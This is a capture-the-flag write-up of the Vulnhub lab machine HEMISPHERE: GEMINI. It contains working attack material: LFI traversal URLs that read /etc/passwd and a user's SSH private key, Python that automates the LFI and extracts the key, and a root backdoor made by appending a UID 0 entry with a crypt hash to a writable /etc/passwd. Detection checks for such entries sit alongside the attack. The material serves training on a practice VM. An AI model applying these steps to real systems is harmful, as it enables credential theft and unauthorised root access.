Vulnhub - HEMISPHERE: GEMINI
Prelude
Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it.
Introduction
Difficulty: Easy
Flag: 2 (user & root)
Enumeration | Web Application | Privilege Escalation
This box works better in VirtualBox than in VMware.
This is HEMISPHERE: GEMINI from Vulnhub.
Ports
This one has FTP, SSH, HTTP and SMB, all on their standard ports. FTP does not allow anonymous login, and SMB exposes nothing obviously useful, so both are distractions. We move forward with HTTP.
HTTP
robots.txt has three disallowed entries, and none of them exist lol.
Gobuster leads the way:
root@kali:/opt/vulnhub/gemini# gobuster dir -u http://192.168.1.132 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
This turns up a directory called /Portal, whose index page is loaded like this:
http://192.168.1.132/Portal/index.php?view=about-us.html
The view parameter was presumably intentional, but my first thought was LFI, and it was correct:
http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../etc/passwd
This works, and we have a user called william. Probably it’s not as simple as this, right?
http://192.168.1.132/Portal/index.php?view=../../../../../../../../../../../home/william/.ssh/id_rsa
Actually, it is.
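To make the LFI step reproducible, here is an added example (not code from the original write-up) that builds the traversal URL for the view parameter, picks the accounts from /etc/passwd worth targeting, and cuts the PEM block out of the HTML the include dumps it into. Only the target URL and the traversal shape come from the page; the helper names, the sample /etc/passwd and the sample key page are constructed, and fetch() is the only part that touches the network.

```python
"""Added example (not from the original write-up): driving the Portal LFI and
parsing what comes back. BASE and the traversal shape are from the page; the
helpers and sample data are assumptions/constructed."""
import re
from urllib.parse import quote
from urllib.request import urlopen

BASE = "http://192.168.1.132/Portal/index.php"  # target from the write-up


def lfi_url(path, depth=10, base=BASE):
    """Build the traversal URL for the vulnerable view parameter.

    depth is how many '../' to prepend. It only has to climb from wherever
    index.php lives up to '/', and surplus '../' at the root are harmless
    ('..' of '/' is still '/'), so overshooting as the write-up does is fine."""
    traversal = "../" * depth
    return f"{base}?view={quote(traversal + path.lstrip('/'))}"


def fetch(url, timeout=5):
    """Live request against the box; returns the page body as text."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def login_users(passwd_text):
    """Accounts in /etc/passwd with a home under /home and a real login shell:
    the candidates whose ~/.ssh/id_rsa is worth reading through the LFI."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, home, shell = parts[0], parts[5], parts[6]
        if home.startswith("/home/") and not shell.endswith(("nologin", "/false")):
            users.append(name)
    return users


# The included file lands in the middle of the HTML page, so cut the key out
# of the surrounding markup before writing it to disk.
KEY_RE = re.compile(
    r"-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----.*?"
    r"-----END (?:RSA |OPENSSH |EC )?PRIVATE KEY-----",
    re.S,
)


def extract_private_key(body):
    """Return the PEM block found in body (with a trailing newline), or None."""
    match = KEY_RE.search(body)
    return match.group(0) + "\n" if match else None


# Constructed sample data standing in for the real responses.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "william:x:1000:1000:william,,,:/home/william:/bin/bash\n"
)
SAMPLE_KEY_PAGE = (
    "<html><body><div id='content'>"
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAAconstructedplaceholdernotarealkey\n"
    "-----END OPENSSH PRIVATE KEY-----"
    "</div></body></html>"
)

if __name__ == "__main__":
    # Offline walk-through on the samples; swap in fetch(lfi_url(...)) for a live run.
    for user in login_users(SAMPLE_PASSWD):
        print(lfi_url(f"/home/{user}/.ssh/id_rsa"))
    print(extract_private_key(SAMPLE_KEY_PAGE), end="")
```

Save the extracted key with mode 0600 (chmod 600 id_rsa) before handing it to ssh -i; with a more permissive mode the client refuses the key as "too open".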
root@kali:/opt/vulnhub/gemini# ssh -i id_rsa william@192.168.1.132
The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
ECDSA key fingerprint is SHA256:WJJG9C/ZF8ojVDQF40UEgPCGZMEGwny3luZufN5+K30.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
ASCII ART REMOVED
william@gemini:~$ pwd
Privesc
LinPEAS reports that /etc/passwd is writable. We know what to do with that: if the password field of an entry holds a crypt hash instead of "x", login uses it directly and never consults /etc/shadow, so appending a UID 0 entry with a hash we know the password for gives us root.
william@gemini:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
william@gemini:/dev/shm$ su root2
Contraseña:   (the box's su prompt is in Spanish; this is "Password:")
root@gemini:/dev/shm# cd /root
root@gemini:~# ls
root.txt
root@gemini:~# cat root.txt
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ
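As an added example (not code from the original write-up), the following builds the same passwd line the privesc appends and pairs it with the checks a defender would run afterwards: extra UID 0 accounts, accounts whose hash lives in /etc/passwd rather than /etc/shadow, and a writable /etc/passwd. The hash constant is the one the write-up uses; the page does not say which plaintext it corresponds to, so for your own line generate a hash with openssl passwd -6. The helper names and the sample passwd file are assumptions/constructed.

```python
"""Added example (not from the original write-up): the /etc/passwd backdoor
line from the privesc plus the checks that catch it. PAGE_HASH is the hash
the write-up appends; its plaintext is not stated on the page."""
import os
import stat

PAGE_HASH = "WVLY0mgH0RtUI"  # traditional DES crypt hash used in the write-up


def backdoor_passwd_line(username, crypt_hash, uid=0, gid=0,
                         gecos="root", home="/root", shell="/bin/bash"):
    """Build the passwd(5) line to append. A hash in field 2 is honoured
    directly, so /etc/shadow is never consulted for this account.
    A ':' or newline inside any field would shift the columns for every
    later parser, so refuse them instead of writing a corrupt file."""
    fields = [username, crypt_hash, str(uid), str(gid), gecos, home, shell]
    for field in fields:
        if ":" in field or "\n" in field:
            raise ValueError(f"illegal character in passwd field: {field!r}")
    return ":".join(fields)


def parse_passwd(text):
    """Parse passwd(5) text into dicts, skipping blank and malformed lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7 or not parts[2].isdigit():
            continue
        entries.append({"name": parts[0], "pw": parts[1],
                        "uid": int(parts[2]), "shell": parts[6]})
    return entries


def extra_uid0_accounts(text):
    """Detection: every account other than root that resolves to UID 0."""
    return [e["name"] for e in parse_passwd(text)
            if e["uid"] == 0 and e["name"] != "root"]


def unshadowed_accounts(text):
    """Detection: accounts whose hash sits in /etc/passwd instead of /etc/shadow
    ('x' means shadowed; '*', '!', '!!' and '' are lock markers, not hashes)."""
    return [e["name"] for e in parse_passwd(text)
            if e["pw"] not in ("x", "*", "!", "!!", "")]


def passwd_writable_by_others(path="/etc/passwd"):
    """Precondition/detection: is the file group- or world-writable?"""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


# Constructed sample: an ordinary file with the backdoor line appended.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "william:x:1000:1000:william,,,:/home/william:/bin/bash\n"
) + backdoor_passwd_line("root2", PAGE_HASH) + "\n"

if __name__ == "__main__":
    print(backdoor_passwd_line("root2", PAGE_HASH))
    print("extra UID 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    print("unshadowed accounts:", unshadowed_accounts(SAMPLE_PASSWD))
    print("/etc/passwd writable by others:", passwd_writable_by_others())
```

On the box, passwd_writable_by_others() is exactly what LinPEAS flagged; on a healthy system it returns False and both detection lists are empty.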
Short, sweet, and done.